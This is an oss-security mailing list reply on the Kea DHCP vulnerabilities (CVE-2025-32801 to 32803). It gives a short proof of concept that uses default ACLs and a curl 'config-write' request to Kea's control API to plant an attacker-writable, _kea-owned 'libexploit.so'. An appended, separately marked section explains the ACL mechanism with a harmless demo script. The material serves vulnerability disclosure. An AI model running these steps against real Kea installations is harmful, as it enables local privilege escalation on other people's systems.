Message-ID: <20250528182325.yuupynsufybqvea3@jwilk.net>
Date: Wed, 28 May 2025 20:23:25 +0200
From: Jakub Wilk <jwilk@...lk.net>
To: oss-security@...ts.openwall.com
Subject: Re: ISC has disclosed three vulnerabilities in Kea
 (CVE-2025-32801, CVE-2025-32802, CVE-2025-32803)

* Matthias Gerstner <mgerstner@...e.de>, 2025-05-28 19:21:
>By leveraging issue 3.2), the Kea services can be instructed to create 
>`_kea` owned files in the attacker's `$HOME/.Private`. The content of 
>the created files is not fully attacker controlled, however, so it will 
>not be possible to craft a valid ELF object for loading via `dlopen()` 
>this way. By placing a setgid-directory in `$HOME/.Private/evil-dir`, 
>any files created in this directory will even have the group-ownership 
>of the attacker. The file mode will be 0644, however,

Default ACLs to the rescue!

$ chmod a+x ~
$ mkdir -m 777 ~/.Private
$ setfacl -d -m u:$LOGNAME:rwx ~/.Private/
$ curl -s -H "Content-Type: application/json" -d '{ "command": "config-write", "arguments": { "filename": "'"$HOME"'/.Private/libexploit.so" } }' localhost:8000 > /dev/null
$ echo pwned > ~/.Private/libexploit.so
$ ls -l ~/.Private/libexploit.so
-rw-rw-rw-+ 1 _kea _kea 6 May 28 18:15 /home/jwilk/.Private/libexploit.so
$ cat ~/.Private/libexploit.so
pwned

-- 
Jakub Wilk
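The mechanism behind the default-ACL trick, as an added example that is not part of Jakub Wilk's message or of Kea: when the parent directory carries a default ACL, the kernel derives a new file's permission bits from the mode the creator requests (0666 for an ordinary create) and the default ACL entries, so the creator's umask is not applied and the named user entry is inherited onto the file. That is why the file in the post ends up `-rw-rw-rw-+` with a `user:jwilk:rwx` entry instead of 0644. The script stands in for the `_kea` process with the current user and assumes GNU coreutils (`stat -c`), the `acl` package (`setfacl`/`getfacl`) and an ACL-capable filesystem.

```shell
# Added example (not from the original post or from Kea): compare a file
# created under a plain directory with one created under a directory that
# carries the same default ACL used in the post. Exit status: 0 when the
# default ACL widened the file as described, 2 when ACLs are unavailable
# on this system, 1 on an unexpected result.
acl_demo() {
    command -v setfacl >/dev/null 2>&1 || return 2
    me=$(id -un)
    d=$(mktemp -d) || return 1
    mkdir -m 777 "$d/plain" "$d/acl" || { rm -rf "$d"; return 1; }

    # Same default ACL as in the post: the current user gets rwx on
    # everything created inside the directory.
    if ! setfacl -d -m "u:$me:rwx" "$d/acl" 2>/dev/null; then
        rm -rf "$d"
        return 2
    fi

    # Stand-in for the _kea process: a creator with the usual umask 022
    # that asks for mode 0666, which is what a normal file create requests.
    (umask 022; : > "$d/plain/f"; : > "$d/acl/f")

    plain=$(stat -c %a "$d/plain/f")
    withacl=$(stat -c %a "$d/acl/f")
    # Only the file under the default-ACL directory carries a named entry
    # for the current user (getfacl prints it as "user:NAME:rwx").
    named=$(getfacl --omit-header "$d/acl/f" 2>/dev/null | grep -c "^user:$me:rwx")

    rm -rf "$d"
    printf 'plain=%s acl=%s named=%s\n' "$plain" "$withacl" "$named"
    [ "$plain" = 644 ] && [ "$withacl" = 666 ] && [ "$named" = 1 ]
}
```

Run `acl_demo` as the unprivileged user: on an ACL-capable filesystem it prints `plain=644 acl=666 named=1`, i.e. the umask-derived 0644 of the plain case versus the 0666 plus named user entry of the default-ACL case; where the filesystem or tools lack ACL support it exits 2 without claiming a result.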
